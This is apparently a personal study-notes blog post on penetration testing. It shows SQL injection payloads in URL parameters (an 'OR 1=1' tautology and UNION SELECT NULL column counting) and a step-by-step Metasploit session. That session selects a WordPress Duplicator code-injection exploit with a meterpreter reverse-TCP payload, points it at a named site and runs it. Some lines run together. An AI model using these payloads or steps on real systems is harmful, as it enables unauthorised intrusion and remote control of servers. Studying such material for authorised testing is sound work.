Pen Testing 3 SQL, Burp
Posted on February 1, 2015
Tags: hacksoft
1 Url search bar
Search bar will convert non-ascii characters to percents aka encoded UTF-8 encoded text
`https://
- white-space CAN be encoded to + OR percent hex representation
- UTF-8 char encodes to percent hex representation
- Target:
https://insecure-website.com/products?category=Gifts: ?category=Gifts- attack 1:
https://insecure-website.com/products?category=Gifts'+OR+1=1-- - attack 2:
https://insecure-website.com/products?category=Gifts%27%20OR%201%3D1%20--
The + in attack 1 is translated into white space NOT the escaped + character.
-- Original
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
--Corrupted
SELECT * FROM products WHERE category = 'Gifts'' OR 1=1--AND released = 1--AND released = 1 gets commented out.
The resulting query is equivalent to SELECT * FROM products
1.1 Finding number of cols
' UNION SELECT NULL,NULL--- keep adding NULL , until query goes through, the number of NULL is the number of columns
2 Metasploit
2.1 Startup
sudo msfdb init && msfconsole
# =[ metasploit v6.2.11-dev ]
# + -- --=[ 2233 exploits - 1179 auxiliary - 398 post ]
# + -- --=[ 867 payloads - 45 encoders - 11 nops ]
# + -- --=[ 9 evasion ]
# Metasploit tip: You can use help to view all
# available commands
# msf6 > 2.2 Find exploit
search name:wordpress
# Matching Modules
# ================
# # Name Disclosure Date Rank Check Description
# - ---- --------------- ---- ----- -----------
# 0 exploit/multi/php/wp_duplicator_code_inject 2018-08-29 manual Yes Snap Creek Duplicator WordPress plugin code injection
# 1 exploit/multi/http/wp_ait_csv_rce 2020-11-14 excellent Yes WordPress AIT CSV Import Export Unauthenticated Remote Code Execution
# 2 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
# 3 auxiliary/gather/wp_all_in_one_migration_export 2015-03-19 normal Yes WordPress All-in-One Migration Export
# 4 exploit/unix/webapp/wp_asset_manager_upload_exec 2012-05-26 excellent Yes WordPress Asset-Manager PHP File Upload Vulnerability
# 5 auxiliary/scanner/http/wordpress_login_enum normal No WordPress Brute Force and User Enumeration Utilityselect the module
use exploit/multi/php/wp_duplicator_code_inject2.3 Show available exploit’s payload
Nothing to do here. It just shows you all the ways your exploit will attack the target.
show payloads
# Compatible Payloads
# ===================
# # Name Disclosure Date Rank Check Description
# - ---- --------------- ---- ----- -----------
# 0 payload/generic/custom normal No Custom Payload
# 1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
# 2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
# 3 payload/generic/ssh/interact normal No Interact with Established SSH Connection
# 4 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)2.4 Show Targets
show targets
# Exploit targets:
# Id Name
# -- ----
# 0 WordPress Duplicator <= 1.2.402.5 Config options
show options
# Module options (exploit/multi/php/wp_duplicator_code_inject):
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# Proxies no A proxy chain of format type:host:port[,type:host:port][...]
# RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-f
# ramework/wiki/Using-Metasploit
# RPORT 80 yes The target port (TCP)
# SSL false no Negotiate SSL/TLS for outgoing connections
# TARGETURI /installer.php yes The TARGETURI where installer.php or installer-backup.php is l
# ocated
# TIMEOUT 40 yes Timeout for web requests
# VHOST no HTTP server virtual host
# Payload options (php/meterpreter/reverse_tcp):
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# LHOST yes The listen address (an interface may be specified)
# LPORT 4444 yes The listen port
# Exploit target:
# Id Name
# -- ----
# 0 WordPress Duplicator <= 1.2.40set RHOSTS somewebsite.com/login.php
set RPORT 802.6 Execute
exploit
